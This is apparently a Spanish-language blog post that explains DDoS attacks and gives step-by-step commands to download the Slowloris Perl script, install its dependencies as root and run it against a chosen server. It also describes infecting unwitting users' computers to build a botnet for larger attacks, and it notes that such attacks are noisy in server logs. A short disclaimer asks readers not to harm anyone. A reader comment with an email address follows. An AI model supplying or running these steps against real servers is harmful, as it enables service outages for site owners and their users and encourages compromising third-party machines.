Viene del inglés, Distributed Denial of Service, y significa ataque distribuido de denegación de señal. El ataque consiste en saturar las peticiones máximas de un servidor, por ejemplo, supongamos una web ficticia llamada www.ficticia.com, dicha web calcula que mas de 5000 visitas a la vez no van a tener, por tanto dan servicio (o aceptan) para 5000 peticiones a la vez en su servidor. Si hubiese 150000 peticiones a la vez, la web se satura y dejaria de estar activa hasta que se restaure. Pues en eso consiste básicamente un ataque DDoS, realizamos miles o millones de peticiones, es decir le inyectamos un flujo de datos al cual no puede dar respuesta el servidor y esta cae, dejándola inaccesible.
¿Cómo realizarlo de forma sencilla?
1º) Descárguense este pequeño script hecho en perl de aquí:
http://ha.ckers.org/slowloris/slowloris.pl
2º) Instalen algunos módulos necesarios, para ello abrimos una consola y tecleamos:
root@root:~# perl -MCPAN -e 'install IO::Socket::INET'
root@root:~# apt-get install libnet-ssleay-perl
root@root:~# apt-get install libssl-dev
root@root:~# perl -MCPAN -e 'install IO::Socket::SSL'
3º) Una vez termine el proceso de instalación anterior, abrimos una consola, nos dirigimos a la ruta donde esté el script slowloris.pl y ejecutamos lo siguiente:
root@root:~# perl ./slowloris.pl -dns ejemplo.com
De esta manera lo que haremos será un ataque a pequeña escala al servidor que elijamos, en este caso "ejemplo.com"
Consejos y recomendaciones
Por último les comentaré algunas cosillas a tener en cuenta:
-Aquí se ha explicado el uso de un script sencillo para que vean la mecánica de funcionamiento, pero el mundo de este tipo de ataques es bastante extenso y recomiendo encarecidamente la lectura de documentos por internet que abundan, y que se informen un poco si les interesa de verdad este tema.
Por ejemplo:
-Normalmente estos ataques no se hacen solo con tu pc, lo que se hace es crear una red de zombies con un botnet como se muestra en la imagen. De esta manera infectaríamos varios ordenadores, de forma que sin que el usuario usado como zombie lo sepa, estén preparados para realizar un ataque masivo todos los zombies a la vez, teniendo mas eficacia nuestro ataque. Así es como logran tirar servidores gente tipo Anonymous, que atacan servidores grandes de EEUU principalmente.
-También decirles que un ataque DDoS deja muchisimas huellas en el log del servidor remoto atacado, es un ataque muy muy muy ruidoso, y destaco esto para los que se crean hackers no la vayan a cagar.
-Por último, y como siempre les digo, no usen esto para joder a la gente, móntense algún server pequeñito y juguetean con él sin molestar. Un saludo y espero que les sea de utilidad!
eres de granada capital? de ser asi... avisame a mi correo jimgsei@gmail.com!! ok?
ResponderEliminar